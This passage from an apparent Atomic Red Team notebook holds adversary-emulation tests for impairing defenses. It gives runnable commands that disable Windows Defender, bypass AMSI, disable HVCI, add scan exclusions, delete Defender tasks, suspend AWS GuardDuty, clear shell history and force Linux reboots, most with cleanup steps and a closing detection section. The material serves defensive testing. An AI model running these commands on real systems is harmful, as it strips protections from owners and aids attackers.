Invoke-AtomicTest T1562.001 -TestNumbers 32

#### Cleanup: 
```cmd
reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 32 -Cleanup

### Atomic Test #33 - LockBit Black - Use Registry Editor to turn on automatic logon -cmdLockBit Black - Use Registry Editor to turn on automatic logon
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Administrator /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /t REG_SZ /d contoso.com /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d password1 /f
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 33

#### Cleanup: 
```cmd
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 33 -Cleanup

### Atomic Test #34 - LockBit Black - Disable Privacy Settings Experience Using Registry -PowershellLockBit Black - Disable Privacy Settings Experience Using Registry
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -PropertyType DWord -Value 1 -Force
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 34

#### Cleanup: 
```powershell
Remove-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 34 -Cleanup

### Atomic Test #35 - Lockbit Black - Use Registry Editor to turn on automatic logon -PowershellLockbit Black - Use Registry Editor to turn on automatic logon
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Value Administrator -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Value contoso.com -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword  -Value password1 -Force
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 35

#### Cleanup: 
```powershell
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 35 -Cleanup

### Atomic Test #36 - Disable Windows Defender with PwSh Disable-WindowsOptionalFeatureThe following Atomic will attempt to disable Windows-Defender using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. 
Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed.
This method will remove Defender and it's packages.
Reference: https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Gui" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Features" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 36

### Atomic Test #37 - WMIC Tamper with Windows Defender Evade Scanning FolderThe following Atomic will attempt to exclude a folder within Defender leveraging WMI
Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 37

#### Cleanup: 
```cmd
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 37 -Cleanup

### Atomic Test #38 - Delete Windows Defender Scheduled Tasks
The following atomic test will delete the Windows Defender scheduled tasks.

[Reference](https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/)

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `command_prompt`!
##### Description: The Windows Defender scheduled tasks must be backed up first

##### Check Prereq Commands:
```cmd
IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( EXIT 0 ) ELSE ( EXIT 1 )

```
##### Get Prereq Commands:
```cmd
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" > "%temp%\Windows_Defender_Scheduled_Scan.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" > "%temp%\Windows_Defender_Cleanup.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" > "%temp%\Windows_Defender_Verification.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" > "%temp%\Windows_Defender_Cache_Maintenance.xml"

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 38 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f )
IF EXIST "%temp%\Windows_Defender_Cleanup.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f )
IF EXIST "%temp%\Windows_Defender_Verification.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f )
IF EXIST "%temp%\Windows_Defender_Cache_Maintenance.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f )
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 38

#### Cleanup: 
```cmd
schtasks /create /xml "%temp%\Windows_Defender_Scheduled_Scan.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
schtasks /create /xml "%temp%\Windows_Defender_Cleanup.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
schtasks /create /xml "%temp%\Windows_Defender_Verification.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
schtasks /create /xml "%temp%\Windows_Defender_Cache_Maintenance.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 38 -Cleanup

### Atomic Test #39 - Clear HistoryClear Shell History. This technique only affect the bash shell application. 
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
history -c
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 39

### Atomic Test #40 - Suspend Historysuspend Shell History seen in Awfulshred wiper- https://unix.stackexchange.com/questions/10922/temporarily-suspend-bash-history-on-a-given-shell
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
set +o history
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 40

#### Cleanup: 
```sh
set -o history
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 40 -Cleanup

### Atomic Test #41 - Reboot Linux Host via Kernel System Requestreboot system via system request seen in Awfulshred wiper.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
echo 1> /proc/sys/kernel/sysrq 
echo b> /proc/sysrq-trigger 
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 41

### Atomic Test #42 - Clear Pagging Cacheclear pagging cache via system request. This is a temporary change in the system to clear paging cache. This technique seen in Awfulshred wiper as part
of its malicious payload on the compromised host. added reference link for this technique: https://www.tecmint.com/clear-ram-memory-cache-buffer-and-swap-space-on-linux/
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
free && echo 3 > /proc/sys/vm/drop_caches && free
echo 3> /proc/sys/vm/drop_caches 
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 42

### Atomic Test #43 - Disable Memory Swapdisable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional 
payload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
swapon -a 
sleep 2
swapoff -a
sync
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 43

#### Cleanup: 
```sh
swapon -a
sleep 2
sync
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 43 -Cleanup

### Atomic Test #44 - Disable Hypervisor-Enforced Code Integrity (HVCI)
This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0".
The pre-req needs to be ran in order to setup HVCI and have it enabled. 
We do not recommend running this in production.
[Black Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)
[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: HVCI must be enabled

##### Check Prereq Commands:
```powershell
if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1 }

```
##### Get Prereq Commands:
```powershell
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 44 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 44

#### Cleanup: 
```powershell
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 44 -Cleanup

### Atomic Test #45 - AMSI Bypass - Override AMSI via COMWith administrative rights, an adversary can disable AMSI via registry value in HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} by overriding the Microsoft Defender COM object for AMSI and points it to a DLL that does not exist.
This is currently being used by AsyncRAT and others. 
https://strontic.github.io/xcyclopedia/library/clsid_fdb00e52-a214-4aa1-8fba-4357bb0072ec.html
https://securitynews.sonicwall.com/xmlpost/asyncrat-variant-includes-cryptostealer-capabilites/
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 45

#### Cleanup: 
```cmd
REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /f
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 45 -Cleanup

### Atomic Test #46 - AWS - GuardDuty Suspension or Deletion
Enables GuardDuty in AWS, upon successful creation this test will suspend and then delete the GuardDuty configuration.

**Supported Platforms:** iaas:aws

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: Check if ~/.aws/credentials file has a default stanza is configured

##### Check Prereq Commands:
```bash
cat ~/.aws/credentials | grep "default"

```
##### Get Prereq Commands:
```bash
echo "Please install the aws-cli and configure your AWS default profile using: aws configure"

```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 46 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
detectorId=$(aws guardduty create-detector --enable --region "us-east-1" | grep -oP '(?<="DetectorId": ")[^"]*')
aws guardduty update-detector --no-enable --detector-id $detectorId
aws guardduty delete-detector --detector-id $detectorId
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 46

#### Cleanup: 
```bash
echo "If test successfully ran, no cleanup required."
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 46 -Cleanup

### Atomic Test #47 - Tamper with Defender ATP on Linux/MacOSWith root privileges, an adversary can disable real time protection. Note, this test assumes Defender is not in passive mode and real-time protection is enabled. The use of a managed.json on Linux or Defender .plist on MacOS will prevent these changes. Tamper protection will also prevent this (available on MacOS, but not Linux at the time of writing). Installation of MDATP is a prerequisite. Installation steps vary across MacOS and Linux distros. See Microsoft public documentation for instructions: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/mac-install-manually?view=o365-worldwide https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/linux-install-manually?view=o365-worldwide
**Supported Platforms:** linux, macos
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
sudo mdatp config real-time-protection --value disabled
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 47

#### Cleanup: 
```sh
sudo mdatp config real-time-protection --value enabled
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 47 -Cleanup

### Atomic Test #48 - Tamper with Windows Defender Registry - Reg.exeDisable Windows Defender by tampering with windows defender registry using the utility "reg.exe"
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f >NUL 2>nul 
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" /v "DisallowExploitProtectionOverride" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection"  /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 48

#### Cleanup: 
```cmd
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "0" /f >NUL 2>nul 
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "0" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" /v "DisallowExploitProtectionOverride" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection"  /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 48 -Cleanup

### Atomic Test #49 - Tamper with Windows Defender Registry - PowershellDisable Windows Defender by tampering with windows defender registry through powershell
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiVirus" -Value 1 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 1 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIntrusionPreventionSystem" -Value 1 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIOAVProtection" -Value 1 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 1 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 1 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRoutinelyTakingAction" -Value 1 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 1 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScriptScanning" -Value 1 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Reporting" -Name "DisableEnhancedNotifications" -Value 1  
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "DisableBlockAtFirstSeen" -Value 1 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "SpynetReporting" -Value 0 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\MpEngine" -Name "MpEnablePus" -Value 0 
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" -Name "DisallowExploitProtectionOverride" -Value 0 
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection"  -Value 0 
Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 0 
Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 0 
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 49

#### Cleanup: 
```powershell
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 0 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name "DisableAntiVirus" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableBehaviorMonitoring" -Value 0 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIntrusionPreventionSystem" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableIOAVProtection" -Value 0 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableOnAccessProtection" -Value 0 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -Value 0 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRoutinelyTakingAction" -Value 0 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScanOnRealtimeEnable" -Value 0 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableScriptScanning" -Value 0 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\Reporting" -Name "DisableEnhancedNotifications" -Value 0  
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "DisableBlockAtFirstSeen" -Value 0
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\SpyNet" -Name "SpynetReporting" -Value 1 
Set-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows Defender\MpEngine" -Name "MpEnablePus" -Value 1 
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" -Name "DisallowExploitProtectionOverride" -Value 1 
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name "TamperProtection"  -Value 1
Set-ItemProperty "HKLM:\software\microsoft\windows defender\spynet" -Name "SubmitSamplesConsent" -Value 1 
Set-ItemProperty "HKLM:\Software\Microsoft\Windows Defender" -Name "PUAProtection" -Value 1 
```

In [ ]:
Invoke-AtomicTest T1562.001 -TestNumbers 49 -Cleanup

## Detection
Monitor processes and command-line arguments to see if security tools/services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Monitoring for changes to other known features used by deployed security tools may also expose malicious activity.

Lack of expected log events may be suspicious.